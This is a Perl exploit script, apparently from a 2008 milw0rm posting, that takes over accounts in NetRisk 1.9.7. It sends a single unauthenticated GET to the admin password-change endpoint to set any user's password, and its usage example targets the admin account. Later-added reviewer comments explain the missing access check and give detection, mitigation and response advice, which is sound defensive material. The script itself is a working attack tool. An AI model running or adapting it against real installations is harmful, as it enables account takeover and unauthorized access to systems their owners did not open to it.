#!/usr/bin/perl
#=====================================================================#
# Author:    Cod3rZ
# Site:      http://cod3rz.helloweb.eu
#=====================================================================#
# Status:    Public
#=====================================================================#
# Board:     NetRisk 1.9.7
# Download:  http://phprisk.org/netrisk_1.9.7.zip
#=====================================================================#
# Vuln Type: Remote Password Change [Exploit]
# Severity:  Highest
#=====================================================================#
# According to the author, the admin control panel (ACP) performs no
# access control, so the password of any other user can be changed
# through this request:
#
#   http://[site]/admin/change_submit.php?username=[user]&new_pass=[newpass]
#
# The author adds that NetRisk contains many other bugs (RFI, SQL
# injection, etc.) but considers this the most severe one and does not
# publish the others here.
#=====================================================================#
# Reviewer notes (defensive reading of this proof of concept):
#
# * Root cause, as described above: admin/change_submit.php acts on the
#   `username` and `new_pass` parameters without verifying that the
#   caller is an authenticated administrator. The request built below
#   carries no cookie, session or credential.
# * Detection: look in web server access logs for GET requests to
#   /admin/change_submit.php carrying `username` and `new_pass` query
#   parameters. Because the new password travels in the query string,
#   it typically ends up in those logs as well, so logs holding such
#   entries should be treated as containing credentials.
# * Mitigation: this page names no fixed release. Until the application
#   enforces an authenticated admin session and an authorization check
#   in change_submit.php, restrict access to /admin/ at the web server
#   (authentication or source-address allow-listing). A password change
#   should also be a POST protected by an anti-CSRF token rather than a
#   GET with the secret in the URL.
# * Response: accounts on an exposed installation should have their
#   passwords reset after the endpoint is locked down, since a change
#   made this way needs no knowledge of the old password.
#=====================================================================#

use LWP::UserAgent;
use HTTP::Request::Common;    # provides the GET request constructor used below

# Indirect object syntax; equivalent to LWP::UserAgent->new.
$lwp = new LWP::UserAgent;

# `cls` is the Windows console clear command; the return value is ignored.
system('cls');

# Positional arguments: target base URL, account name, password to set.
$site = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];

# Banner, printed on every run.
print q{ --------------------------------------------------------------------- :: NetRisk 1.9.7 Remote Password Change Exploit :: --------------------------------------------------------------------- Author : Cod3rZ Email : songforthemoment@yahoo.it Site : http://cod3rz.helloweb.eu ---------------------------------------------------------------------};

if(!$site || !$user || !$pass) {
    # Any missing (or false-valued, e.g. "0") argument prints the usage text.
    print q{ Usage: perl netrisk.pl [site] [user] [newpass] Usage: perl netrisk.pl site.com/netrisk admin 123456 ---------------------------------------------------------------------};
    # Runs `exit` in a child shell only; it does not terminate this script.
    # The script ends here simply because nothing follows the if/else.
    system('exit');
}
else {
    # Echo the supplied arguments, including the new password, to the console.
    print " Site: $site User: $user Pass: $pass --------------------------------------------------------------------- Waiting... ---------------------------------------------------------------------";

    # Single GET to the admin password-change endpoint; the account name and
    # the new password are passed as query parameters, exactly as supplied.
    $connect = $lwp->request(GET $site."/admin/change_submit.php?username=".$user."&new_pass=".$pass);
    $content = $connect->content;

    # Only the response body is inspected. "username->" is presumably text
    # the page prints after a change -- not verifiable from this file.
    if($content =~ /username->/) {
        print " Password Changed ---------------------------------------------------------------------";
    }
    else {
        print " Error ---------------------------------------------------------------------";
    }
}

# http://cod3rz.helloweb.eu
# milw0rm.com [2008-01-05]